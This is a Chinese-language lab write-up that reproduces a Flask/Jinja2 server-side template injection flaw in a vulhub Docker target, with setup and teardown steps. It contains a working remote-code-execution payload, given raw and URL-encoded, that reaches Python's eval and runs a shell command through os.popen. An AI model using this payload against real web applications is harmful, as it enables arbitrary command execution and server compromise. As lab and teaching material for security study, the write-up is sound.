一、服务端模板注入漏洞
简述:
服务器模板注入 (SSTI ) 是一种利用公共 Web 框架的服务器端模板作为攻击媒介的攻击方式,该攻击利用了嵌入模板的用户输入方式的弱点。SSTI 攻击可以用来找出 Web 应用程序的内容结构。
二、利用搭的vulhub靶机漏洞复现
1、 service docker start //进入虚拟机后开启docker服务
docker version 查看docker版本信息确认是否开启
2、cd /vulhub/flack/ssti //进入到ssti的目录下
3、cat README.md //查看README.md 目录,这里是该漏洞复现的具体流程。
4、docker-compose up -d && docker-compose build // 加载环境并运行
5、然后在浏览器上访问http://your-ip:8000,
6、访问http://your-ip/?name={{233*233}},得到54289,说明SSTI漏洞存在。
7、 获取eval函数并执行任意python代码的POC: //获取os
``` {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} ```
8、最后放到浏览器里注意要url编码,得到执行结果。
http://your-ip:8000/?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
三、漏洞复现成功后,可删除掉镜像
1、docker-compose down //docker-compose容器停止运行
2、docker ps //查看容器进程
docker images //查看下载保存的镜像
3、docker rmi 1a2dea4ab6aa //需要删除ssti_flask 下载源地址